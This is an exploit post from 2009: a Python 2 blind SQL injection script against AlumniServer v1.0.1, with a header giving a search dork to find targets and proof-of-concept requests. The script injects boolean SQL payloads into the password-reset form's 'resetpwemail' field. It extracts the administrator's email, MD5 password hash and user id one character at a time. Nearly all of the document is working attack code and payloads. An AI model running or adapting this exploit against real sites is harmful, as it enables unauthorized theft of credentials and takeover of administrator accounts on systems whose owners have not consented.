alumniserver-blindsql.txt
Posted on 26 June 2009
#!/usr/bin/python #-------------------------------------------------------------------------------- #(POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1--> #-------------------------------------------------------------------------------- # #CMS INFORMATION: # #-->WEB: http://www.alumniserver.net/ #-->DOWNLOAD: http://www.alumniserver.net/ #-->DEMO: N/A #-->CATEGORY: CMS/Education #-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools # and companies. Services for usersinclude profile page,... #-->RELEASED: 2009-06-11 # #CMS VULNERABILITY: # #-->TESTED ON: Python 2.6 #-->DORK: "AlumniServer project" #-->CATEGORY: BSQLi PYTHON EXPLOIT #-->AFFECT VERSION: CURRENT #-->Discovered Bug date: 2009-06-15 #-->Reported Bug date: 2009-06-15 #-->Fixed bug date: N/A #-->Info patch (????): N/A #-->Author: YEnH4ckEr #-->mail: y3nh4ck3r[at]gmail[dot]com #-->WEB/BLOG: N/A #-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. #-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) # #------------ #CONDITIONS: #------------ # #magic quotes=OFF # #-------- #NEEDED: #-------- # #Valid email # #--------------------------------------- #PROOF OF CONCEPT (SQL INJECTION): #--------------------------------------- # #POST http://[HOST]/[PATH]/Password.php HTTP/1.1 #Host: [HOST] #Referer: http://[HOST]/[PATH]/Password.php #Content-Type: application/x-www-form-urlencoded # #resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE #resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE # #Other P0C (with a registered user): # #http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE #http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE # #-------------- #WATCH VIDEOS #-------------- # # BSQLi --> http://www.youtube.com/watch?v=K3z7iyHttBw # # AUTH BYPASS --> http://www.youtube.com/watch?v=UjDm2p7qHj0 # # ####################################################################### ####################################################################### ##*******************************************************************## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### ####################################################################### # #Used modules import urllib2,sys,re,os #Defined functions def init(): if(sys.platform=='win32'): os.system("cls") os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit") os.system ("color 02") else: os.system("clear") print " ####################################################### " print " ####################################################### " print " ## AlumniServer v-1.0.1 Blind SQLi Exploit ## " print " ## ++Conditions: magic_quotes=OFF ## " print " ## ++Needed: Valid mail ## " print " ## Author: Y3nh4ck3r ## " print " ## Contact:y3nh4ck3r[at]gmail[dot]com ## " print " ## Proud to be Spanish! ## " print " ####################################################### " print " ####################################################### " def request(urltarget,postmsg): req=urllib2.Request(url=urltarget,data=postmsg) conn = urllib2.urlopen(req) outcode=conn.read() #print outcode #--> Active this line for debugger mode return outcode def error(): print " ------------------------------------------------------------ " print " Web isn't vulnerable! " print " --->Maybe: " print " 1.-Patched. " print " 2.-Bad path or host. " print " 3.-Bad mail. " print " 4.-Magic quotes ON. " print " EXPLOIT FAILED! " print " ------------------------------------------------------------ " sys.exit() def testedblindsql(): print " ----------------------------------------------------------------- " print " WEB MAYBE BE VULNERABLE! " print " Tested Blind SQL Injection. " print " Starting exploit... " print " ----------------------------------------------------------------- " def helper(filename): print " [!!!] AlumniServer v-1.0.1 Blind SQL Injection Exploit " print " [!!!] USAGE MODE: [!!!] " print " [!!!] python "+filename+" [HOST] [PATH] [MAIL] [ID_ADMIN/HIDDEN/BRUTEFORCEID] " print " [!!!] [HOST]: Web. " print " [!!!] [PATH]: Home Path. " print " [!!!] [MAIL]: Mail for fish " print " [!!!] [ID_ADMIN/HIDDEN/BRUTEFORCEID]: Id_admin if we are registered users or 'hidden' value if admin is hidden. " print " [!!!] Also can use 'bruteforceid' value for bruteforce admin id previously. " print " [!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com cd54cd7df99a " print " [!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com hidden " print " [!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com bruteforceid " sys.exit() def brute_length(urlrequest, idadmin, mail): #Username length flag=1 i=0 while(flag==1): i=i+1 if(idadmin=="hidden"): blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+hideuser='y')='"+str(i) #injected code else: blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+id='"+idadmin+"')='"+str(i) #injected code output=request(urlrequest, blindsql) if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)): flag=2 else: flag=1 #This is the max length of email if (i>50): error() #Save column length length=i print " <<<<<--------------------------------------------------------->>>>> " print " Length catched! " print " Length E-mail --> "+str(length)+" " print " Wait several minutes... " print " <<<<<--------------------------------------------------------->>>>> " return length def exploiting (lengthvalue, urlrequest, column, idadmin, mail): #Bruteforcing values values="" k=1 z=32 while((k<=lengthvalue) and (z<=126)): #Choose method, hidden or with id if(idadmin=="hidden"): blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+hideuser='y'),"+str(k)+",1))='"+str(z) #injected code else: blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+id='"+idadmin+"'),"+str(k)+",1))='"+str(z) #injected code output=request(urlrequest, blindsql) if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)): values=values+chr(z) k=k+1 z=32 #new char z=z+1 return values def exploiting_id (urlrequest, mail): #Bruteforcing values values="" #Possible values of id arrayids=[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'] k=1 #Max length of id = 12 while(k<=12): for z in arrayids: blindsql="resetpwemail="+mail+"'+AND+substring((SELECT+id+FROM+as_users+HAVING+MIN(membersince)),"+str(k)+",1)='"+str(z) #injected code output=request(urlrequest, blindsql) if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)): values=values+str(z) k=k+1 z='g' return values #Main init() #Init variables if(len(sys.argv) <= 4): helper(sys.argv[0]) host=sys.argv[1] path=sys.argv[2] mail=sys.argv[3] #Define mode: ID, hidden or bruteforceid if(sys.argv[4]=="hidden"): mode="hidden" elif(sys.argv[4]=="bruteforceid"): mode="bruteforceid" else: mode="usual" idadmin=sys.argv[4] finalrequest="http://"+host+"/"+path+"/Password.php" testblind1="resetpwemail="+mail+"%27+and+1%3D%271" #Return true outcode1=request(finalrequest,testblind1) testblind2="resetpwemail="+mail+"%27+and+1%3D%270" #Return false outcode2=request(finalrequest,testblind2) #Check BSQLi if(outcode1==outcode2): error() else: testedblindsql() if(mode=="usual"): #Catching length of admin email lengthadmin=brute_length(finalrequest, idadmin, mail) mailadmin=exploiting(lengthadmin, finalrequest, "email", idadmin, mail) #Catching value of password (hashed md5) passwordhash=exploiting(32, finalrequest, "password", idadmin, mail) elif(mode=="hidden"): #Catching length of admin email lengthadmin=brute_length(finalrequest, "hidden", mail) mailadmin=exploiting(lengthadmin, finalrequest, "email", "hidden", mail) #Catching value of password (hashed md5) passwordhash=exploiting(32, finalrequest, "password", "hidden", mail) else: print " <<<<<--------------------------------------------------------->>>>> " print " Bruteforcing id. Wait a few minutes... " print " <<<<<--------------------------------------------------------->>>>> " #Catching value of admin id idadmin=exploiting_id(finalrequest, mail) print " ************************************************* " print " ********* EXPLOIT EXECUTED SUCCESSFULLY ******** " print " ************************************************* " #Mode usual and hidden if((mode=="usual") or (mode=="hidden")): print " Admin-mail: "+mailadmin+" " print " Password hash: "+passwordhash+" " else: #Mode bruteforceid print " Admin-id: "+idadmin+" " print " <<----------------------FINISH!-------------------->> " print " <<---------------Thanks to: y3nh4ck3r-------------->> " print " <<------------------------EOF---------------------->> "
